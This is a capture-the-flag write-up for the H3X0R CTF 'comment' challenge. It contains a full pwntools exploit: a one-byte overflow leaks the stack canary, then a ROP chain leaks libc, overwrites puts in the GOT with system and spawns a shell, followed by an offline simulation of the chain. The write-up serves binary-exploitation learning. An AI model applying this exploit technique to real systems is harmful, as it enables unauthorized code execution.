cdor1's lab
H3X0R CTF comment
Notes: triggered the vulnerability through a 1-byte overflow! I extended the accepted input range only as far as ret, then went past ret with gets, which reads unlimited input, and attacked with ROP.
This problem reminded me of ropasaurusrex, which I solved when I was first getting into pwnables.
from pwn import *

# s = remote('localhost', 4000)
s = remote('52.199.49.117', 10005)
elf = ELF('/home/cdor1/pwnable/comment')

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
gets_plt = elf.plt['gets']
bss = elf.bss()

pop_ret = 0x08048A3F     # pop ; ret gadget: discards one argument between calls
ret_target = 0x080486C9  # function that prints a 'password' prompt and reads the answer with gets()

def login(password):
    s.recvuntil(b'Choose :')
    s.sendline(b'1')
    s.recvuntil(b'Give me the password')
    s.sendline(password)

def write(comment):
    s.recvuntil(b'Choose :')
    s.sendline(b'2')
    s.recvuntil(b'Give me your comment!')
    s.sendline(comment)

def view():
    s.recvuntil(b'Choose :')
    s.sendline(b'3')

def edit(comment):
    s.recv(2048)
    s.sendline(b'4')
    s.recv(2048)
    s.sendline(comment)

login(b'{0h_y0u_s01v3d_5t3p_0n3}')

# Step 1: leak the canary. The comment buffer holds 1024 bytes; edit() accepts one
# byte more, which overwrites the canary's low 0x00 byte, so view() prints on past
# the comment into the remaining three canary bytes.
write(b'A' * 1024)
edit(b'A' * 1025)
edit(b'B' * 1025)
view()
s.recvuntil(b'B' * 1025)
canary = u32(b'\x00' + s.recv(3))
log.info('canary : ' + hex(canary))

# Step 2: grow the editable range until it reaches the saved return address
# (1024 buffer + 4 canary + 12 saved registers = 1040).
for _ in range(8):
    edit(b'A' * 1040)

# Step 3: overwrite the return address with ret_target, keeping the canary intact.
payload = b'B' * 1024
payload += p32(canary)
payload += b'A' * 12
payload += p32(ret_target)
edit(payload)

# Leave the menu so the function returns into ret_target.
s.sendline(b'5')
s.sendline(b'5')

# Step 4: ret_target reads with gets(), so the chain has no length limit:
#   gets(bss)       <- "/bin/sh"
#   puts(puts_got)  -> leak the libc address of puts
#   gets(puts_got)  <- overwrite the GOT entry with system
#   puts(bss)       -> puts@plt now jumps to system("/bin/sh")
payload = b'A' * 50
payload += p32(canary)
payload += b'A' * 12
payload += p32(gets_plt) + p32(pop_ret) + p32(bss)
payload += p32(puts_plt) + p32(pop_ret) + p32(puts_got)
payload += p32(gets_plt) + p32(pop_ret) + p32(puts_got)
payload += p32(puts_plt) + b'AAAA' + p32(bss)
s.sendline(payload)

s.sendline(b'/bin/sh\x00')
s.recvuntil(b'password\n')
leak = u32(s.recv(4))
base = leak - 0x6F690    # offset of puts in the remote libc
system = base + 0x45390  # offset of system in the remote libc
log.info('leak : ' + hex(leak))
log.info('base : ' + hex(base))
log.info('system : ' + hex(system))

s.sendline(p32(system))
s.interactive()
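The chain from the final stage, replayed offline as an added example (this is not the writeup's code and needs no network or binary). It rebuilds the payload with the writeup's pop;ret gadget and libc offsets, then walks it the way a 32-bit cdecl return would: each PLT call is followed by the gadget that pops its argument, the canary is checked before the chain runs, and puts@plt resolves through its GOT slot, which is why the last puts() call runs system("/bin/sh") once gets() has rewritten that slot. The PLT, GOT and .bss addresses and the libc base are assumed placeholders (the exploit reads them from ELF() and from the leak), and the leaked canary bytes are constructed.

```python
import struct

# libc offsets used by the writeup
LIBC_PUTS = 0x6F690
LIBC_SYSTEM = 0x45390
# pop ; ret gadget from the writeup
POP_RET = 0x08048A3F
# PLT / GOT / .bss addresses: ASSUMED placeholders (the exploit takes them from ELF())
GETS_PLT, PUTS_PLT = 0x08048400, 0x08048420
PUTS_GOT = 0x0804A018
BSS = 0x0804A100


def p32(x):
    return struct.pack('<I', x & 0xFFFFFFFF)


def u32(b):
    return struct.unpack('<I', bytes(b[:4]))[0]


def recover_canary(leaked3):
    """The canary's lowest byte is always 0x00. The 1-byte overflow replaces it,
    so view() runs past the comment and prints the other three bytes."""
    return u32(b'\x00' + leaked3)


def build_payload(canary, pad=50):
    """Frame + chain sent to the gets() reached via 0x080486C9 (same layout as the writeup)."""
    rop = b'A' * pad + p32(canary) + b'A' * 12            # buffer, canary, saved registers
    rop += p32(GETS_PLT) + p32(POP_RET) + p32(BSS)        # gets(bss)       <- "/bin/sh"
    rop += p32(PUTS_PLT) + p32(POP_RET) + p32(PUTS_GOT)   # puts(puts_got)  -> leak libc puts
    rop += p32(GETS_PLT) + p32(POP_RET) + p32(PUTS_GOT)   # gets(puts_got)  <- system
    rop += p32(PUTS_PLT) + b'AAAA' + p32(BSS)             # puts@plt now jumps to system("/bin/sh")
    return rop


def attacker(outputs):
    """What the exploit feeds to each gets(): "/bin/sh" first, then the address of
    system() computed from the puts() leak that precedes the second gets()."""
    if not outputs:
        return b'/bin/sh'
    libc_base = u32(outputs[-1]) - LIBC_PUTS
    return p32(libc_base + LIBC_SYSTEM)


def run_payload(payload, canary, libc_base, stdin=attacker, pad=50):
    """Model the vulnerable function returning into the chain (x86, cdecl).
    Returns (calls made, puts() outputs, command passed to system() or None)."""
    mem = {}

    def write(addr, data):
        for i, b in enumerate(data):
            mem[addr + i] = b

    def read(addr, n):
        return bytes(mem.get(addr + i, 0) for i in range(n))

    def cstr(addr):
        out = bytearray()
        while mem.get(addr + len(out), 0):
            out.append(mem[addr + len(out)])
        return bytes(out)

    libc = {libc_base + LIBC_PUTS: 'puts', libc_base + LIBC_SYSTEM: 'system'}
    write(PUTS_GOT, p32(libc_base + LIBC_PUTS))          # GOT starts out pointing at libc puts
    if payload[pad:pad + 4] != p32(canary):
        raise RuntimeError('*** stack smashing detected ***')
    stack = [u32(payload[i:i + 4]) for i in range(pad + 16, len(payload), 4)]
    esp, calls, outputs = 0, [], []
    while esp < len(stack):
        target, esp = stack[esp], esp + 1                # ret
        if target == POP_RET:
            esp += 1                                     # pop: discard the argument slot
            continue
        if target == GETS_PLT:
            func = 'gets'                                # its GOT slot is never touched here
        elif target == PUTS_PLT:
            func = libc.get(u32(read(PUTS_GOT, 4)))      # the PLT stub jumps through its GOT slot
            if func is None:
                raise RuntimeError('puts@got points outside libc')
        else:
            raise RuntimeError('ret to %#x is not part of the model' % target)
        arg = stack[esp + 1]                             # cdecl: [retaddr][arg0]
        calls.append((func, arg))
        if func == 'gets':
            write(arg, stdin(outputs) + b'\x00')         # unbounded write; gets() appends a NUL
        elif func == 'puts':
            outputs.append(cstr(arg))
        else:
            return calls, outputs, cstr(arg)             # system(arg): the shell
    return calls, outputs, None


if __name__ == '__main__':
    canary = recover_canary(b'\xbe\xad\xde')            # constructed leak: canary 0xdeadbe00
    calls, outputs, cmd = run_payload(build_payload(canary), canary, 0xf7e12000)
    for c in calls:
        print('%-6s %#x' % c)
    print('system() receives:', cmd)
```

Feeding the model a payload built with the wrong canary aborts before the first link runs, which is the reason the leak in step 1 has to come before any of the longer edits.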